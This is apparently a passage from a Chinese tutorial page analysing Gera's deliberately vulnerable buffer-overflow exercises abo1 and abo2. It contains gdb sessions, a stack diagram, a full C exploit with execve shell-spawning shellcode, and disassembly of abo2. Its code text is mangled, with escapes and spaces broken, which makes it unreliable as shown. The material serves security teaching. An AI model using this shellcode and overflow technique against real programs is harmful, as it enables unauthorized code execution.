📄 467.html
字号:
edi 0xbffff954 - 1073743532<br />
eip 0x41414141 0x41414141<br />
eflags 0x10286 66182<br />
(gdb) bt<br />
# 0 0x41414141 in ?? ()<br />
Cannot access memory at address 0x41414141<br />
( gdb) q<br />
The program is running. Exit anyway? ( y or n) y<br />
user@ CoreLabs:~/ gera$<br />
<br />
当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.<br />
0xbfffffff ---> +--------------------------------------+<br />
| 四个空字节 |<br />
0xbfffffff ---> +--------------------------------------+<br />
| 程序名 |<br />
+--------------------------------------+<br />
| shellcode |<br />
shellcode的地址---> +--------------------------------------+ <---<br />
| SHELL的环境变量和命令行参数保存区 | |<br />
+--------------------------------------+ |<br />
四个字节---> | 返回地址 | ----<br />
+--------------------------------------+<br />
四个字节---> | 保存的ESP |<br />
+--------------------------------------+<br />
| | Buf[256] | /|\<br />
| | | |<br />
| | AAAAAAAA | |<br />
栈增长方向 | | AAAAAAAA | |缓存区溢出方向<br />
| | AAAAAAAA | |<br />
| | AAAAAAAA | |<br />
| | AAAAAAAA | |<br />
\|/ +--------------------------------------+<br />
| |<br />
<br />
<br />
首先函数返回地址被压进栈,然后是保存的ESP,再就是本地变量Buf[256],而我们的目标就是覆盖函数的返回地址。要想溢出必需要256+4+4=264字节的长度才能做到,在最后4个字节里要有shellcode的地址。但是shellcode的地址在不同环境下编译的程序是不同的,在linux下我们使用一个技巧,用一下公式来计算这个地址:<br />
<br />
shellcode_addr=0xbffffffa-strlen(name_of_program)-strlen(shellcode)<br />
<br />
下面是相应的exploit:<br />
/*<br />
** exp1. c<br />
** Coded by CoreSecurity ¨C info@ core- sec. com<br />
**/<br />
# include < string. h><br />
# include < unistd. h><br />
# define BUFSIZE 264 + 1<br />
/* 24 bytes shellcode */<br />
char shellcode[]= "x31xc0x50x68x2fx2fx73x68x68x2fx62x69" "x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80";<br />
int main( void) {<br />
char * env[ 3] = {shellcode, NULL};<br />
char evil_ buffer[ BUFSIZE];<br />
char * p;<br />
/* Calculating address of shellcode */<br />
int ret=0xbffffffa-strlen( shellcode)-strlen("/ home/ user/ gera/ abo1");<br />
/* Constructing the buffer */<br />
p = evil_ buffer;<br />
memset( p, ' A', 260); // Some junk<br />
p += 260;<br />
*(( void **) p) = ( void *) ( ret);<br />
p += 4;<br />
* p= '0';<br />
execle("/ home/ user/ gera/ abo1", " abo1", evil_ buffer, NULL, env);<br />
}<br />
<br />
<br />
高级缓存区溢出代码2的分析<br />
源代码:<br />
/* abo2. c * <br />
* specially crafted to feed your brain by gera@core-sdi.com */<br />
<br />
/* This is a tricky example to make you think * <br />
* and give you some help on the next one */<br />
<br />
int main( int argv, char ** argc)<br />
{ <br />
char buf[256];<br />
<br />
strcpy(buf,argc[1]);<br />
exit(1);<br />
}<br />
<br />
让我们再来调试一下这个程序,看看跟abo1有什么不一样。<br />
<br />
user@ CoreLabs:~/ gera$ gcc abo2. c - o abo2 - ggdb<br />
user@ CoreLabs:~/ gera$ gdb ./ abo2<br />
GNU gdb 5.0<br />
Copyright 2000 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you<br />
are welcome to change it and/ or distribute copies of it under certain<br />
conditions.<br />
Type " show copying" to see the conditions.<br />
There is absolutely no warranty for GDB. Type " show warranty" for details.<br />
This GDB was configured as " i386- slackware- linux"...<br />
( gdb) r ` perl - e ' printf " A" x 264'`<br />
Starting program: / home/ user/ gera/ abo2 ` perl - e ' printf " A" x 264'`<br />
<br />
Program exited with code 01.<br />
( gdb) disass main<br />
Dump of assembler code for function main:<br />
0x8048430 < main>: push % ebp<br />
0x8048431 < main+ 1>: mov % esp,% ebp<br />
0x8048433 < main+ 3>: sub $ 0x108,% esp<br />
0x8048439 < main+ 9>: add $ 0xfffffff8,% esp<br />
0x804843c < main+ 12>: mov 0xc(% ebp),% eax<br />
0x804843f < main+ 15>: add $ 0x4,% eax<br />
0x8048442 < main+ 18>: mov (% eax),% edx<br />
0x8048444 < main+ 20>: push % edx<br />
0x8048445 < main+ 21>: lea 0xffffff00(% ebp),% eax<br />
0x804844b < main+ 27>: push % eax<br />
0x804844c < main+ 28>: call 0x8048334 < strcpy><br />
0x8048451 < main+ 33>: add $ 0x10,% esp<br />
0x8048454 < main+ 36>: add $ 0xfffffff4,% esp<br />
0x8048457 < main+ 39>: push $ 0x1<br />
0x8048459 < main+ 41>: call 0x8048324 < exit><br />
0x804845e < main+ 46>: add $ 0x10,% esp<br />
0x8048461 < main+ 49>: leave<br />
0x8048462 < main+ 50>: ret<br />
End of assembler dump.<br />
( gdb) q<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -